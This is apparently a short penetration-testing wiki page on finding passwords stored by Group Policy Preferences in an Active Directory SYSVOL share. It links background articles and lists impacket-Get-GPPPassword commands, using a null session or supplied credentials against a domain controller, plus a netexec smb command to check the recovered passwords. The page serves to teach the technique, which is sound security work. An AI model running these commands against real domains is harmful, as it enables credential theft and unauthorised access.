Group Policy Preferences

Finding Passwords in SYSVOL & Exploiting Group Policy Preferences

There is already bunch of article that discuss about this topic. Some of them are:

https://adsecurity.org/?p=2288
https://podalirius.net/en/articles/exploiting-windows-group-policy-preferences/
https://podalirius.net/en/articles/exploiting-windows-group-policy-preferences/

The quickest way to hunting credentials from GPP is using impacket-Get-GPPPassword.

# with a NULL session
impacket-Get-GPPPassword -no-pass 'DOMAIN_CONTROLLER'
# with cleartext credentials
impacket-Get-GPPPassword 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER'

And then, you can verify the credentials using NetExec or Evil-WinRM.

netexec smb TARGET -u 'username' -p 'password'

PreviousCredential Hunting NextMisc

Last updated 2 months ago